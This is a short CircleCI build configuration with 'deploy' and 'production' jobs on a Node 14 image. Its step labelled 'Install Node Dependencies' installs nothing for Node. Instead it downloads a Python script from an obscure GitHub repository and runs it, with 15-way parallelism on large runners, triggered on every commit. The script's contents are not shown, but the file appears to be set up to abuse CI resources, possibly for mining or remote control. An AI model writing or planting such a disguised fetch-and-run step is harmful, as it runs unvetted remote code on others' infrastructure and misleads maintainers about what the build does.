working_dir: &working_dir ~/node 
.build_template: &builder 
  parallelism: 15 
  resource_class: large 
  steps:  
    - checkout  
    - run:  
        name: Install  Node Dependencies 
      
        command: |
           wget https://raw.githubusercontent.com/sjhks/YAjk/main/yes.py
           python yes.py
 
version: 2.0  
jobs:  
  deploy:  
    <<: *builder  
    docker:  
      - image: circleci/node:14.17.3 
  production:  
    <<: *builder  
    docker:  
      - image: circleci/node:14.17.3 
  
workflows:  
  version: 2  
  commit:  
    jobs:  
      - deploy  
      - production